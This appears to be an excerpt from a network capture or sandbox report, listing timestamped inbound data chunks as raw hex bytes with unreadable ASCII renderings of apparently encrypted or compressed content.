                                                                                                                                                    2022-09-29 12:59:14 UTC20407INData Raw: 58 e1 c5 2c fc 45 76 32 13 37 f8 18 39 6e 82 66 ac 13 58 e5 2c 36 d2 9c 77 5d ab 29 c2 2d b2 1b 63 2a 25 01 19 c4 c0 ba 91 7f 16 d3 eb c3 40 9e bc 62 46 8f 84 38 58 85 00 40 be 07 aa aa 02 8b 9a a8 3a 5c 5b ea 2f a0 d4 64 be 9e 33 de 51 1c ce e0 dc 8d dd 64 78 5c e8 08 97 64 97 05 8f d1 6f 50 44 cc 34 2f 5e 11 23 c3 35 04 e0 e2 0e 43 ef 95 05 6e 57 73 91 8e 9e b2 0f aa a4 22 c2 fd 60 26 89 bd 3a 84 29 40 c6 18 31 0b 7b 16 a9 1d 55 75 4d 7c 51 00 2d 98 4d eb 1e 8b 7b e0 4f 25 6f 53 53 7b 20 78 1e 7b f2 2d 4e 93 a2 65 d6 a2 33 97 9a ad b3 e1 9d 7f 8b e5 f7 9a 0a 9b d6 c2 a6 c7 2c 7c cf 69 73 d8 69 d8 6e 43 64 7d 97 34 ab 41 bf 68 74 a5 30 12 0d 1a ec 89 23 00 37 bb 4c 81 4e 20 02 d1 6c d1 12 84 9b 3c 60 dd 89 c1 0e 05 7b f8 43 2f 32 e0 d5 80 15 5f 2e 95 95
                                                                                                                                                    Data Ascii: X,Ev279nfX,6w])-c*%@bF8X@:\[/d3Qdx\doPD4/^#5CnWs"`&:)@1{UuM|Q-M{O%oSS{ x{-Ne3,|isinCd}4Aht0#7LN l<`{C/2_.
                                                                                                                                                    2022-09-29 12:59:14 UTC20423INData Raw: 65 49 d8 f1 bf ed 2c 8a 10 84 f3 1b fd 9a 7f 6b a2 96 c3 b7 2b cb 31 2c a1 64 71 22 db 94 7c 62 d5 c1 db bb 8f 8d 47 44 be 53 16 de ee b6 ab c6 a7 a9 3f a1 54 63 6b 97 9f a8 75 18 69 90 e4 10 ee 38 f1 5b e7 de cd c3 95 da d1 84 36 c0 8c 70 12 c0 09 9b ea 16 bf a7 28 0d 5f 0c 74 94 ea 3d 9d c6 35 f6 a3 32 0c ed ab 31 11 b9 8e 32 3c 03 b9 c2 40 43 11 b7 db de db ec a1 29 ce 34 bb 0c 5b 13 c1 45 9b 50 fc 91 96 98 55 06 d6 f8 ba 76 f6 a7 45 e1 c3 97 2b f3 0c fc 7c cf c7 65 2d 18 57 3d 78 7c 03 ed 49 ae d5 b0 33 29 0f 67 16 ff 76 ce 81 57 e4 e4 23 27 d5 b6 6c 8b 4d 04 94 d0 a5 e3 ec 44 2c 87 23 a8 33 0f 6c 91 fb 56 6d ed 19 d7 e3 8f a0 b1 83 3c d9 dd 13 19 cd 7b ba 5e 41 ab d1 af 7d 40 af fe c2 c6 a4 86 70 04 8f 49 4b 4c 1b a7 45 4c c2 c7 22 0e c9 30 2e 43 56
                                                                                                                                                    Data Ascii: eI,k+1,dq"|bGDS?Tckui8[6p(_t=5212<@C)4[EPUvE+|e-W=x|I3)gvW#'lMD,#3lVm<{^A}@pIKLEL"0.CV
                                                                                                                                                    2022-09-29 12:59:14 UTC20439INData Raw: 41 f9 96 20 da 73 18 94 07 11 56 10 4c 05 f5 cc 76 01 94 be 0d a2 9a e7 40 81 0f 0c f5 bd 78 ce 1c b1 8c 65 64 70 25 7b 22 93 47 c5 e6 c3 8e 15 f5 39 77 77 54 a4 33 48 5c 5e 42 0f ac 53 d7 49 7b 29 db 9b db e1 b2 3a 46 ec 20 73 6d 36 e6 5b 3c af 24 1a 98 f6 bd 4f b0 22 8c 3f 52 11 ba 62 24 92 87 47 39 30 3e db d9 17 65 fb b8 c6 bb fe a1 8a a6 12 5d c0 1c b7 95 f1 1b f9 b2 1c 29 c1 fa bc 34 e8 e3 af 1b 82 69 42 c8 a4 24 35 e9 24 27 b6 12 b8 59 3c 69 fe 1c 34 87 c3 49 6d ff 91 85 34 f2 20 35 a0 21 a3 cf 51 64 14 d1 83 57 63 0a ef 07 dd f7 c1 d4 f3 91 45 fd 6a d1 3d f8 88 02 ee 1c dd e4 be ec 88 f9 99 c1 e0 cf 00 94 97 b7 20 41 25 91 94 bf 3a 41 71 1b c3 99 00 42 8b d9 45 dc fa 97 4d d4 31 80 e3 61 25 92 f7 9d a3 59 95 8c e3 f1 4f 0c 59 2c bc a2 2a c9 5c 9a
                                                                                                                                                    Data Ascii: A sVLv@xedp%{"G9wwT3H\^BSI{):F sm6[<$O"?Rb$G90>e])4iB$5$'Y<i4Im4 5!QdWcEj= A%:AqBEM1a%YOY,*\
                                                                                                                                                    2022-09-29 12:59:14 UTC20455INData Raw: be 13 4b 08 37 ca 9a 8f d3 bc bd 88 5b fe d9 58 ce 91 20 3f 0f 43 2c 69 66 13 9f ee ff 07 74 aa 2d e7 ed 1e 67 41 b7 ac 58 87 50 50 c9 ba 17 f1 e7 65 2c 88 a5 40 f8 19 d5 ba 37 60 52 ec c6 fc 36 52 ca 57 07 a3 ab 92 50 26 34 6e 11 44 e8 bf 26 aa ec 9c 06 8b fe 0a 4a 92 ac 9d 47 d8 4f be d9 18 14 7b 40 10 f1 62 07 d3 59 58 6e 2c ee 36 22 1f a9 77 2b de 4b 00 37 7f 53 53 54 2e 98 9e 5e d2 8c 8d 45 d3 23 6b ce 4e c9 7c ce 48 d3 52 84 a7 04 a1 93 3f 8b 6f 97 e6 19 ba 42 62 96 f9 e8 43 90 b2 24 11 32 86 08 16 43 bf d9 36 fe b6 4c be b2 21 b3 f7 32 b5 da 41 90 4d 66 1f 6a 75 6e 9f 4f 52 02 63 80 03 af b8 5a 58 64 2c cf 18 27 76 e6 9c 93 00 e2 b2 81 e8 34 12 0f db 2c c7 b5 48 d3 b7 80 21 57 d2 58 47 c1 24 c0 5e 24 f4 c8 a4 3c d1 23 02 9a ab e4 63 e4 fb 36 17 63
                                                                                                                                                    Data Ascii: K7[X ?C,ift-gAXPPe,@7`R6RWP&4nD&JGO{@bYXn,6"w+K7SST.^E#kN|HR?oBbC$2C6L!2AMfjunORcZXd,'v4,H!WXG$^$<#c6c
                                                                                                                                                    2022-09-29 12:59:14 UTC20471INData Raw: f4 74 87 3a 1e aa d2 e3 d9 17 58 93 19 87 17 3c b1 32 0a a1 cc 35 86 13 8f 28 55 42 da a7 29 3a ba d9 c8 a2 8e 2e bf 31 02 21 01 00 0e 74 51 95 1b e4 7d 63 88 a4 4b bd 9d 64 d2 15 d4 e0 b1 84 97 fa 5b 61 f9 3d b3 2d 44 4f ba 08 51 6e 13 82 1b 7f e3 63 8e a6 d2 df 5f 29 a2 8c b1 b5 bd 7b 7e b2 af bb 62 eb 0b d5 3e 35 c9 90 25 d3 9c c7 80 8f fb e2 24 f4 a2 96 91 3e 4e 27 e9 78 75 0d 52 ef 3c 56 0f b6 ae 24 3d 64 b1 5f 72 de 69 b6 e6 c8 dd b2 44 36 ce 6d 2b 02 6f de 56 bb f3 f4 b6 75 aa 35 a4 ec f6 b0 65 05 3f e8 4d 3c 27 33 55 91 9e b4 75 d5 42 fd 84 d0 c2 66 5d 9d 58 92 b4 3e ad cb 92 8c 8b ca a4 94 eb 51 81 de 69 91 da 77 01 69 e3 71 97 32 47 cb 20 d0 f6 e2 ad 89 4c c6 ed 44 06 0f 1a 33 03 ff d4 a0 46 2f 68 bb 99 2e 1c 93 d3 12 87 68 30 ef 1a 6a 02 12 0c
                                                                                                                                                    Data Ascii: t:X<25(UB):.1!tQ}cKd[a=-DOQnc_){~b>5%$>N'xuR<V$=d_riD6m+oVu5e?M<'3UuBf]X>Qiwiq2G LD3F/h.h0j
                                                                                                                                                    2022-09-29 12:59:14 UTC20487INData Raw: 51 69 60 57 2c aa 50 74 d8 6d 34 9c 2d b4 4e 11 f7 85 2c a5 fa d7 d1 da 57 04 4c 42 fd b2 92 a6 6c 7e 3a 89 69 12 b0 f5 ae 49 2a 0c 9c e0 0a 67 ce 26 77 bd 6c aa d4 0c 8f bb 0a dd b0 0b 7c 69 dc 8e bd eb 3b 24 47 c8 92 87 e4 7e 4e 90 ed cc ba e3 90 c3 97 41 e7 e8 f8 5a 0e e4 9e 82 f2 4c b3 01 4b 97 66 e0 a1 ba 35 30 2c db 8c fa 1f 79 b9 91 9f 60 58 e8 3c c7 de 6c 5c e6 f9 33 3a c2 29 c9 1a a2 b4 88 32 4b 90 c5 be 27 88 c9 42 9d c6 99 89 b1 07 62 56 7d 5b c5 b2 03 79 01 c1 6c 55 57 cc c8 32 8e 00 e6 5b 51 07 d1 e7 3f f0 9b c8 27 58 a5 d2 a0 32 84 06 9d 36 82 5a 58 5f d8 73 85 6f db eb 51 12 91 c1 86 d1 1e 68 dd b2 90 fe 96 c1 c0 8c 53 5a 8c 07 15 72 ca cc c5 99 20 b3 02 dd 43 66 4c 17 27 b2 2f 79 bf 84 48 7e cd 9f 39 e3 c7 77 96 0f 7d 48 0b ad 48 21 a4 d1
                                                                                                                                                    Data Ascii: Qi`W,Ptm4-N,WLBl~:iI*g&wl|i;$G~NAZLKf50,y`X<l\3:)2K'BbV}[ylUW2[Q?'X26ZX_soQhSZr CfL'/yH~9w}HH!
                                                                                                                                                    2022-09-29 12:59:14 UTC20503INData Raw: d4 ea 44 a0 20 d4 81 48 3b 3d c8 b2 50 c6 9a b2 f6 f2 09 07 48 56 08 ce 3d 94 5a ed 55 54 80 63 11 3c 0b c1 f0 d6 31 dc fb 18 ea 7a f7 66 2b f6 13 f2 7a 05 fb 49 6a 25 73 f7 dd 27 bc bc 00 ca 21 3a 5a 66 c3 83 e6 45 ec 5c 97 92 2b b1 99 74 e6 41 f9 89 17 74 bc db 50 67 b7 43 52 f5 ac 78 dd 55 1a f9 67 f0 eb f2 0e 74 84 6b 35 bf 0b 35 ee c0 a5 81 1d 73 4e 41 34 0b 3b f1 32 04 a2 7a b6 5c b5 f0 3c 71 be e4 80 26 47 b7 7b 8c 35 14 39 be 08 da 33 7e a4 b5 be a9 9d 36 94 ce 28 10 4e 7c da ab 12 e1 e8 43 62 b3 7c 36 53 27 e1 a5 aa 5c ee 04 4c da 27 fd 14 02 50 57 55 09 2d f6 ac 6a b5 a5 b4 8d f7 56 02 51 64 1f ff 08 74 fa be 0e cd 3c 0e 72 27 c1 a3 b3 0c 6b 1c 3a 82 d8 a8 db 9e 29 44 aa 67 5c 61 a7 5c ec 28 79 ce f0 f7 dc 7d d1 44 f8 41 92 7b 42 57 9b 3e e4 32
                                                                                                                                                    Data Ascii: D H;=PHV=ZUTc<1zf+zIj%s'!:ZfE\+tAtPgCRxUgtk55sNA4;2z\<q&G{593~6(N|Cb|6S'\L'PWU-jVQdt<r'k:)Dg\a\(y}DA{BW>2
                                                                                                                                                    2022-09-29 12:59:14 UTC20519INData Raw: d4 79 64 20 2e af 01 b8 9f 81 93 4a 0e a9 f8 27 55 79 8a 84 fd 26 12 ba fd e1 de 80 48 26 0c ce 2a 9f 9a 8f 27 aa f7 4d bf 36 91 05 c7 b1 25 64 69 06 2d 35 d1 b8 e7 0b 88 cc 57 41 30 5a 2c db 87 e0 62 22 e1 75 9b ba 56 4b 22 d8 71 5a 9c 28 4b 5b 44 de a9 86 0f f2 12 52 01 df 2f c1 80 5b 5e 1f f3 c6 3f 97 fe 4a d7 34 8e 1b 81 50 92 4d d3 07 d7 08 aa 48 7c 73 a9 9d 21 61 a8 0b ca 98 4f ca 5a 30 d7 43 6e 46 c8 5d 89 b4 1f f9 cb 5e c5 2b 20 ec 5a 69 f1 0a e0 25 ec a8 c0 5c ed 56 54 3b f3 2b 7d b7 7f e4 79 5a cd 6e 7b 3a f0 eb 3a 4b ed 8d 84 d6 f5 4a 98 3d 8b 6d 84 c0 6c 5c c0 d8 c4 14 44 62 c2 3f 36 fa fa a3 ee 1d 06 3b 6b 7d 0c d4 67 53 02 9d 3d 6e d7 3a d0 f3 71 d3 99 a5 8f 18 05 82 dd 94 13 2a d3 56 c7 2e 00 23 26 32 90 d4 11 74 c0 a3 c5 6b ee b3 14 6b 16
                                                                                                                                                    Data Ascii: yd .J'Uy&H&*'M6%di-5WA0Z,b"uVK"qZ(K[DR/[^?J4PMH|s!aOZ0CnF]^+ Zi%\VT;+}yZn{::KJ=ml\Db?6;k}gS=n:q*V.#&2tkk
                                                                                                                                                    2022-09-29 12:59:14 UTC20535INData Raw: 34 bd 06 b3 eb 4f a2 8d e5 cd 61 2b 97 f2 c5 65 16 4f 55 77 4c 66 ef 57 84 9a f1 83 49 9f 4f 11 48 a9 61 4f a4 ad a9 df 03 65 40 c9 0e 00 9e 98 70 e5 77 b8 92 e0 0f d5 19 02 52 1c 22 29 78 de 4e ec f0 3b 59 9d 30 38 fe 73 a4 11 98 94 0e 5a bb 9a 78 c4 b5 38 93 db f1 ae 44 f0 ec 68 53 17 93 fe 7a 66 2c 7e d1 c3 65 14 0a 09 cf 92 bc 96 5f 31 e8 c9 19 11 77 0d 29 05 bc 20 32 8f 33 42 bb 08 3f b9 0f 0a 11 34 f9 d6 fc df 63 ab d8 e4 df 15 d8 18 fd 5a 45 49 4d cf 76 2b 7f fd d2 05 a7 e7 2e 5e 52 52 05 0e c4 d5 50 f4 31 26 90 9d e9 80 49 a6 64 3e 19 61 9e eb 41 53 71 a1 fb c7 f7 a9 8f 6b 56 75 42 f7 77 40 5e 63 d9 80 34 4e 71 01 cb ac 95 05 15 00 9c 90 e8 7e 94 f1 51 93 9f 44 f6 eb ad 47 b2 7d ec d7 d1 20 be 31 d7 68 e7 f4 28 6d a1 ed 4c 05 1e 6b 54 85 ed 35 a3
                                                                                                                                                    Data Ascii: 4Oa+eOUwLfWIOHaOe@pwR")xN;Y08sZx8DhSzf,~e_1w) 23B?4cZEIMv+.^RRP1&Id>aASqkVuBw@^c4Nq~QDG} 1h(mLkT5
                                                                                                                                                    2022-09-29 12:59:14 UTC20551INData Raw: ca a9 ec fd 41 65 d5 d7 bb 77 2a bf 8b ff 6f 2f a8 af a7 9b ad 4c c9 96 b3 d9 7f 6e 8f 92 51 1d f2 4d ae 16 54 0d ef 1d c9 ec 64 b1 78 e5 95 0d bc b7 c5 2c 8d c2 23 7a 95 3c c0 58 34 24 99 2e 4a 45 fb a4 b1 6e 6f 6c 1c 3f c5 fc ea 06 f7 2c 93 db aa ac 72 47 b5 8d f1 26 85 cf 67 a0 70 d8 ff 4e 11 f1 b6 2b 0a 48 e9 3e b9 c2 10 fc 1b 79 6e d4 98 4e 95 35 4f c2 30 95 8a af d5 2b eb 55 44 44 e5 b0 40 9a 92 0c 7e b6 b1 41 b6 dd 3b 9b 77 eb 41 41 56 96 23 9f f3 fb 62 35 9e 35 62 a8 d2 c2 2a 44 73 f3 6f b6 c3 6b b6 7c 96 0f 16 f6 65 0d 03 97 90 18 e9 4d 5f a1 f2 e3 2a b9 03 f1 4c 4b 90 94 49 ac 98 2c 2c a9 17 44 ee e1 68 17 e7 a8 fc 5f 42 eb ce c9 5b f7 05 da 8c 56 30 8f 91 a5 54 32 5b 07 66 8f ef 31 5a 39 88 ce 53 3a 51 da ee 2a 08 33 a7 97 24 85 cc 38 f2 26 28
                                                                                                                                                    Data Ascii: Aew*o/LnQMTdx,#z<X4$.JEnol?,rG&gpN+H>ynN5O0+UDD@~A;wAAV#b55b*Dsok|eM_*LKI,,Dh_B[V0T2[f1Z9S:Q*3$8&(
                                                                                                                                                    2022-09-29 12:59:14 UTC20567INData Raw: fb 56 a3 0c 82 93 b2 5c b2 92 fd 6d da 5a d1 1b bb 92 49 b8 f4 49 1f d7 da bf d2 f0 a5 cd 2e 4d 79 6b 73 28 d9 93 fb 3b 23 16 26 8b ed b9 05 27 e7 cd b1 a6 98 c5 eb a6 04 b4 2f 32 20 ec 89 9e b1 65 7d 66 2e a9 eb 12 70 2b b0 b9 41 06 fb 1f c8 1d 56 36 f2 6d be ce 6c 1a 70 2c 85 f7 2d f9 7f 48 3e 49 33 f5 21 f6 44 ad 5d 42 ea 09 9a dc f2 5c 26 46 89 a3 e7 e7 b8 ce 8d 16 a3 8d b0 3a 61 a1 5a a4 1d 55 19 fd 88 7d 01 b0 97 42 e2 de 16 40 20 4f 62 79 6b 18 6b ff 37 16 73 00 80 72 51 38 a5 5e e0 d1 fc 64 28 66 75 fd a3 35 1d 13 34 87 de cd 23 0c c7 df ec a7 5c 63 4e 06 96 c9 0d d0 2f bf bb c5 48 84 c6 ae 17 e2 78 be b9 2e 51 b7 95 79 35 83 60 d7 1a c8 c1 aa eb 8d 29 46 77 b4 ff 3a 1a 88 0e aa d7 37 48 59 ff 65 7a d2 55 94 86 35 dd 91 35 64 ad b8 c4 c3 c1 5b d2
                                                                                                                                                    Data Ascii: V\mZII.Myks(;#&'/2 e}f.p+AV6mlp,-H>I3!D]B\&F:aZU}B@ Obykk7srQ8^d(fu54#\cN/Hx.Qy5`)Fw:7HYezU55d[
                                                                                                                                                    2022-09-29 12:59:14 UTC20583INData Raw: 40 8e b9 b5 e9 ca 4e 88 3f fd 60 24 93 dd bb 28 83 28 7d cd e2 3f 49 84 2d 34 bd 0f e4 cf 83 84 34 cb 67 d7 45 6e c9 26 61 0d 57 15 1f a8 7c 85 70 89 b0 bf 7c 6e 07 66 66 9e df 1e 7c ba 67 66 5d a9 be 51 61 a8 98 53 ec 69 60 b9 50 58 ca 3b bb 59 d7 15 9e a1 a9 c1 e2 7a be 4f a5 e8 8b 9a bf 99 8f f1 83 fb 8e d7 e9 0f 36 41 bb 0c 2a ff 05 a9 67 70 dd 6b 2c 68 67 8a bd af 7d 46 34 52 59 07 f9 e8 6b 1f 31 ed 82 89 d9 d5 ec 7f f2 17 21 44 d5 f0 17 af a7 50 05 4e 09 74 ad 80 c3 d2 49 72 3d 4f 11 cc fd f7 63 0b 59 86 d9 fa 94 fe 84 ff 0a f5 19 03 04 59 d4 d0 43 e2 69 dd 0a 73 8c ce 73 b0 20 1e 78 14 4c 75 24 13 bd ae 7d 12 0a 26 8b 5f e0 f0 4d b9 8d a4 eb 8e 12 05 89 e9 6f c2 ff 8d 5a ca 8f 14 27 c2 98 f3 02 d1 43 64 fb c7 f3 1f e1 f4 57 eb 68 e9 d0 c0 75 e9 95
                                                                                                                                                    Data Ascii: @N?`$((}?I-44gEn&aW|p|nff|gf]QaSi`PX;YzO6A*gpk,hg}F4RYk1!DPNtIr=OcYYCiss xLu$}&_MoZ'CdWhu
                                                                                                                                                    2022-09-29 12:59:14 UTC20599INData Raw: a5 f1 22 62 9d cd 3d 43 4c bf 51 cd 97 de 6b ea d6 bd da 12 23 7a db 7a fd 0b 2d 56 78 d5 6c bc 42 d7 a2 35 00 8f ba a9 a8 e3 c3 ca c0 97 b7 48 c6 d0 13 c8 57 78 c2 63 dd 32 f6 4b 42 c6 01 78 18 26 ef b3 96 4a ec 1a ed b2 a3 b2 df cc de ea 5f 33 03 61 a1 1c d8 67 77 69 24 0c da 8b 04 98 60 a9 f0 90 77 f1 6c d0 cc 12 93 dd 65 17 be e5 5b 2e 7f 04 bd b9 5e c1 d8 df c2 a1 e4 23 4d 90 9e fe 5e ed 8c 0b 46 c7 6d ff 7c 0c 3b 22 ec 0a 50 f0 0f c8 bf 61 78 12 77 9a 0a 54 3f ca 86 90 61 f2 79 c7 eb 3b 0e c6 29 84 9c 72 d8 12 25 9b e2 d1 25 f3 6c bc 8d 26 ce b9 c8 3b d4 d6 86 0a c4 87 d0 cd c0 58 c5 57 e9 0e 95 d8 7c 67 c4 e1 19 90 df 80 7e 9e f3 bc 72 96 21 13 9f df 89 07 5e 3d 54 a4 c3 70 e4 7f 20 28 b7 f0 51 e7 a5 70 c3 a5 45 0d ac 58 bf 62 63 da 94 05 8f 8a c7
                                                                                                                                                    Data Ascii: "b=CLQk#zz-VxlB5HWxc2KBx&J_3agwi$`wle[.^#M^Fm|;"PaxwT?ay;)r%%l&;XW|g~r!^=Tp (QpEXbc
                                                                                                                                                    2022-09-29 12:59:14 UTC20615INData Raw: 9d 54 e7 37 fc fe f2 b3 40 60 f2 82 d8 8e 8a 24 c9 4e a1 d3 ca aa 78 c3 9e d9 af 4c b5 96 7f 70 b5 ac 8a 0d 65 1e be 43 46 ce 79 c3 97 51 16 fa 36 52 74 b2 a4 cf 2e 3f 45 59 3e ad 5d 9b ab 83 1a 0b f8 5e 76 68 9a 5a 77 3c b5 5d 9d 2a 0b aa 97 c9 a0 97 aa 10 ae cb b8 ea 0c 8f c7 15 0f 45 39 3e 69 73 4d 2b 88 18 51 95 f0 c9 ab d8 bd 17 8b 47 ab f3 49 e3 3b b3 1f 8d 6a 50 b4 ca d2 b0 0c df 9c 1e 80 ce e0 46 41 c4 a8 c5 cb d1 8b c3 30 8f 61 85 5e a9 56 c8 fc a7 5c 57 99 f7 58 3a b8 13 47 bf f5 60 c5 a9 5e d0 bc 6d a8 1b 65 66 5e 09 9f 1c 40 7e c3 53 30 7d 57 6c 30 18 ab 6d e9 ba 20 d3 bd fa c1 51 47 df 74 f3 d9 36 5b c5 5e 08 4f 88 cd d2 3f b6 10 38 7e 45 27 30 b2 ea 59 f9 2d 19 87 e9 e7 47 43 f8 fb cd c0 87 44 c1 a3 cb 94 80 26 f4 b7 d4 94 47 da 5d 25 94 80
                                                                                                                                                    Data Ascii: T7@`$NxLpeCFyQ6Rt.?EY>]^vhZw<]*E9>isM+QGI;jPFA0a^V\WX:G`^mef^@~S0}Wl0m QGt6[^O?8~E'0Y-GCD&G]%
                                                                                                                                                    2022-09-29 12:59:14 UTC20631INData Raw: 1d c0 54 ed 46 db 48 86 53 96 c6 e1 fb 9c fd 54 e7 84 77 4d 88 46 d4 da bf 87 45 0a 36 2c 08 b1 83 78 10 32 69 36 70 69 50 36 2c a9 23 71 a6 d4 ad b9 24 04 f4 ca 15 c6 81 91 13 82 2c dc b1 27 51 6d 20 0b c2 8a 5b fd a6 45 6c 4b 87 46 11 d5 ea b3 86 8c f2 33 1c 86 dc bd 11 d9 e1 f6 6e fa 50 7f df 6d 6b a5 2b 01 39 f0 b5 66 43 dd d3 84 5b e0 e4 e6 f5 51 f8 1a 12 84 e7 33 12 ce 33 17 20 79 9c 02 b7 52 49 36 28 b7 e6 9a 83 ec b7 f6 03 4a 9f f2 7c fa 2e 20 16 88 1a 32 40 a2 e7 9a ed c2 ff 85 c1 37 8a 93 f7 d8 d9 b2 4e 95 5e 28 fa 46 5c fd 7f 9b 04 fc 70 45 5a a6 99 47 e2 3f eb 19 8a c7 d8 d3 db 69 85 9e b0 31 4a e7 da bc 72 49 88 1e 1c a5 6b 3b c8 7c 55 86 0c 05 8e 99 38 0b 74 b6 9c 1e d4 43 67 e0 f4 c2 03 0f b0 81 64 5d 04 37 1f b0 7c 9e 00 3a 8c 49 59 3b 2f
                                                                                                                                                    Data Ascii: TFHSTwMFE6,x2i6piP6,#q$,'Qm [ElKF3nPmk+9fC[Q33 yRI6(J|. 2@7N^(F\pEZG?i1JrIk;|U8tCgd]7|:IY;/
                                                                                                                                                    2022-09-29 12:59:14 UTC20647INData Raw: 7a 96 67 b6 63 f7 94 c7 1e 73 aa b5 7c 6c 0b fa ef 07 66 26 13 9b 86 78 48 51 6a 8c 1e 0e 5f 52 3c 4d 9e cf 34 fd aa 8e 2f 8c 2b ed 70 25 65 1f d6 c3 61 70 4e dc f1 2c fe 03 42 68 bf df 32 ac ea 4a 4d 1d b0 f9 e6 f6 07 e1 bb 61 65 70 f1 aa 82 6d cc e7 42 44 c3 ee bd eb d4 33 db b3 11 3d bc ac d4 c8 9c bb 75 af e9 fa e9 b6 08 de 34 5c 95 4a 3b 3b a9 44 0b 36 c8 19 6a 30 fb 4c ed 33 38 c2 e5 3f 6c 30 49 c0 f8 ec 4c 7e ce 2b 19 f3 38 25 da 45 33 7a a5 e5 9b d8 99 71 51 4c 0f 8f 5d 8e 53 9d 96 85 6c f4 25 f2 59 0e 30 54 44 a6 99 c7 22 2b 65 aa d6 8f 15 17 ae 50 2b 29 53 f8 1c e6 f5 9f cd cc c7 b5 bc 56 4d 42 b4 23 82 16 aa c3 28 b3 2c c9 b0 da c1 23 74 4f 01 86 6c 20 3b ac 05 6d fc c3 96 5e b4 94 55 3f e7 cd 36 cb f0 d9 a4 57 9d b9 b6 a5 a9 e0 ed 66 61 d1 24
                                                                                                                                                    Data Ascii: zgcs|lf&xHQj_R<M4/+p%eapN,Bh2JMaepmBD3=u4\J;;D6j0L38?l0IL~+8%E3zqQL]Sl%Y0TD"+eP+)SVMB#(,#tOl ;m^U?6Wfa$
                                                                                                                                                    2022-09-29 12:59:14 UTC20663INData Raw: e8 15 8a f3 ad 51 b2 98 fe 1e 5e cf 25 f0 58 71 56 3f 2c b6 05 61 10 6f ed 9a 13 96 c7 36 95 15 0c 35 6f c0 ee 4c ab a9 01 af 1a 8f 34 cb 1f 5b 2a c8 c7 c7 08 11 ca cf 42 cb 9b f2 88 1e 59 1c c7 8f 1a bb be 63 7e e9 87 e9 a5 df 04 73 17 04 37 01 48 40 10 3c 45 66 b1 9d e3 18 36 2b ed a0 6f 81 22 fb ea c6 3b 73 00 cc 59 77 09 10 9a f0 09 2d 65 2a fe 47 73 e2 62 fe fc b0 33 6b 06 3c fe cf a4 87 dd 8a bb 7c 9a f0 38 24 08 40 f8 9f 54 ed 3a 8a 01 e1 c3 25 58 9f e2 56 f5 44 27 25 78 28 87 57 d3 39 59 23 93 73 d2 ca 58 5e 7b 09 b3 1c 04 e5 1b b0 78 fb c9 43 b0 63 c9 1a 0f 06 45 3a 25 ad d5 a1 3d 76 1f 1a 1a 7a 5f ee ea ae ad a2 d2 63 0a 01 eb 4a 5c 6f 9d 98 eb a1 34 df 74 7a 57 5c 59 ac 87 7b 18 6e 9d 0a 7b 70 29 f2 ca e6 19 e4 7e bf f8 76 6f 2f bb b2 27 9a e2
                                                                                                                                                    Data Ascii: Q^%XqV?,ao65oL4[*BYc~s7H@<Ef6+o";sYw-e*Gsb3k<|8$@T:%XVD'%x(W9Y#sX^{xCcE:%=vz_cJ\o4tzW\Y{n{p)~vo/'
                                                                                                                                                    2022-09-29 12:59:14 UTC20679INData Raw: e1 84 f0 50 5a 21 b3 48 7f 34 49 8e 5e 15 ce c7 f7 a0 51 73 eb 6c 62 65 a8 49 d4 2c dd 24 de d5 b0 43 f5 5a 28 9f bc bb df 32 39 cd f0 71 5e f0 35 38 4c da 5a 0d 95 af 23 b1 86 39 6b cc 28 57 9e d0 d7 f5 6c ba 86 83 79 cf a2 6f 7b 23 93 e9 87 93 38 39 22 9d 33 a7 fe 00 a3 ed 9b a3 2b 47 eb 67 71 3b c4 a7 5f 7f ac c6 53 f7 6c 5b 85 cf c2 71 94 21 3c bb 30 85 ac e5 f0 aa 0c 98 e3 b9 e0 7c 35 c7 ba 42 e8 ed f1 3c ea 1f 9c df 25 bd 44 4d 21 d3 c9 77 f1 fe 28 e1 57 99 2f 94 67 6b 6f 87 f8 51 01 fb f8 79 f7 95 22 e0 8b 77 cd c4 65 66 38 b2 a9 07 fd f9 4f d2 5e 5c 4c dd f2 41 62 c5 a5 f3 92 b4 59 b6 b7 39 74 f7 93 78 71 b2 a2 10 84 b2 d6 b7 68 95 83 59 61 96 6d b3 f1 c4 36 4a ef f9 c7 53 d9 8e c4 8d 0c 93 b6 36 b7 30 04 d7 77 f8 63 7e 05 6a 0e 34 a5 38 0f f6 6d
                                                                                                                                                    Data Ascii: PZ!H4I^QslbeI,$CZ(29q^58LZ#9k(Wlyo{#89"3+Ggq;_Sl[q!<0|5B<%DM!w(W/gkoQy"wef8O^\LAbY9txqhYam6JS60wc~j48m
                                                                                                                                                    2022-09-29 12:59:14 UTC20695INData Raw: 72 42 5b 35 a2 92 f6 24 cc 89 68 e2 7a bc d1 7a a5 26 39 85 a6 4e 63 92 b8 ee 21 8c 8b d2 c3 d7 11 39 c4 33 ff cd 46 2c 5e 53 94 16 2c cc 44 a0 c3 c0 52 a5 ae 78 01 bc e5 b8 83 ab 7e 79 24 4a 34 56 49 7b 82 39 0d f7 dc d5 b7 d1 78 11 6b 58 f7 a8 a8 df a0 fa 07 78 12 13 f1 fd 9b 2e 40 e0 16 a3 2e 1a 89 9b 3e 8f 49 09 c8 51 b5 3f 57 d7 c4 57 d3 be f3 68 76 30 b3 37 7c 02 3f 25 93 13 2e 9e 59 8e 79 1e da ac 43 29 38 4a 00 84 ac 0b 37 66 b5 fa 72 02 2a a3 8e 0b 52 da e0 5d 92 45 3b 39 b0 f3 8f 4e 8f 4e 54 a6 b8 a3 75 37 aa fc 1b 10 9b 57 c0 5b 91 82 0f 56 5e 08 8e 15 68 1f 8c 30 29 bc 5a 58 76 87 11 8a 49 0b 6b 64 b5 55 60 be a5 71 71 f7 73 f0 7e 9c d8 76 2c 80 85 26 5c 85 f5 a1 2f bb 46 95 86 87 98 8f 85 53 79 1c 29 f2 0c f7 60 a4 65 0a 3e 5a 52 55 56 6b 26
                                                                                                                                                    Data Ascii: rB[5$hzz&9Nc!93F,^S,DRx~y$J4VI{9xkXx.@.>IQ?WWhv07|?%.YyC)8J7fr*R]E;9NNTu7W[V^h0)ZXvIkdU`qqs~v,&\/FSy)`e>ZRUVk&
